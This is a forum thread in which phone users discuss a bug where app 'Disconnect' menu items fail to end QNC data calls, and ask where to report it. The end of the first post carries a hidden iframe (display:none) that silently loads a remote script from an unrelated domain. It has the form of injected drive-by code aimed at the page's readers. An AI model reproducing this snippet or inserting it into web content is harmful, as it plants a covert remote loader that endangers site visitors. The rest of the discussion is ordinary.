+ Reply to Thread

"Disconnect" on menu not working?

Anyone else notice on their phone that no Disconnect menu items actually cause a QNC call to disconnect? This is my experience in any programs that I've tried so far that have such a menu item, and I always have to use the phone keypad disconnect.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I too have noticed this on many, but not all apps.
    ~'kito
    pdaPhoneHome Moderator

Not only that, but for programs like Eurora, the "Disconnect after send/check" option does NOT seem to work . Has anyone been able to figure this out yet? It's really annoying as I ALWAYS forget to disconnect from the call.
    Thx,
    Brian

I have never had it fail to disconnect, but it certainly takes a long time to disconnect. Particularly from a dormant mode EN connection.

Alan

Originally posted by alanb
    I have never had it fail to disconnect, but it certainly takes a long time to disconnect. Particularly from a dormant mode EN connection.

Alan
    Same here; Disconnect works from all of the apps I've tried it on, though it sometimes takes awhile.

It's a conspiracy with the carriers, so that it eats up a lot more minutes.
    ~'kito
    pdaPhoneHome Moderator

I am still using QNC, and none of the apps ever disconnect when going to the menu item. Does anyone else here using QNC have this problem? Or does it totally work for you?
    Thx,
    Brian

I'm using QNC, and it never disconnects, no matter how long I wait. I consider this a pretty major and obvious bug to have gotten past Verizon's "rigorous" testing. Doh! Can you hear me now?

Originally posted by briansin
    I am still using QNC, and none of the apps ever disconnect when going to the menu item. Does anyone else here using QNC have this problem? Or does it totally work for you?
    Thx,
    Brian

I agree Rick. Do you know of a good place to report this to? Maybe we can get a fix for it in subsequent firmware updates?

Sure don't - I've never felt the need with the 6035!

Perhaps if Hotsync is listening he knows, he seems to be pretty familiar with the process through beta testing.

Originally posted by briansin
    I agree Rick. Do you know of a good place to report this to? Maybe we can get a fix for it in subsequent firmware updates?